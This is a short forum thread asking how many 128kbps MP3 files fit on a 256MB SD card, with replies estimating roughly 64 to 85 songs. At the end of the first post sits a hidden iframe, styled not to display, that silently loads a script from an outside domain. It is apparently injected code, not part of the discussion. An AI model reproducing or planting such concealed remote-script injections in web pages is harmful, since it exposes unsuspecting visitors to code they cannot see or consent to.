How many Mp3's?

So if I have a 256MB SD for my future 7135 and I wanted to fill it chock-full of 128kbps Mp3's (and only Mp3's) so that I can have a nice random mix, and the songs were "average" in length (we're not talkin' the Doors' song "The End" here), approximately how many will fit on the card?

~Markito

P.S. Sorry, I know this sounds a lot like the old, "If a train leaves Chicago going 80 miles per hour and another train leaves Fargo going 90 miles per hour, then..." word problems from our school days.:sleep<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Ok Markito, I took a look at my mp3 collection on my laptop here to find an answer for you. It just so happens that I am sitting on a train from Chicago to Fargo (though I don't know how fast we are going) so it is very appropriate that I answer this question for you.

I took a cross-section of random music encoded at 128kbps and found that each song averaged approx 3mb. That means a 256 card would hold approx 85 songs. Pretty sweet, no?

Now I want the answer to two questions...
1) When am I going to get one of these phones???
2) If you put a mirror on a copy machine, do you go back in time? (I'm too afraid to try it)

It's usually a meg a minute. On the average

64 songs at 4 minutes a piece or so on the average.

This is assuming 128kbps
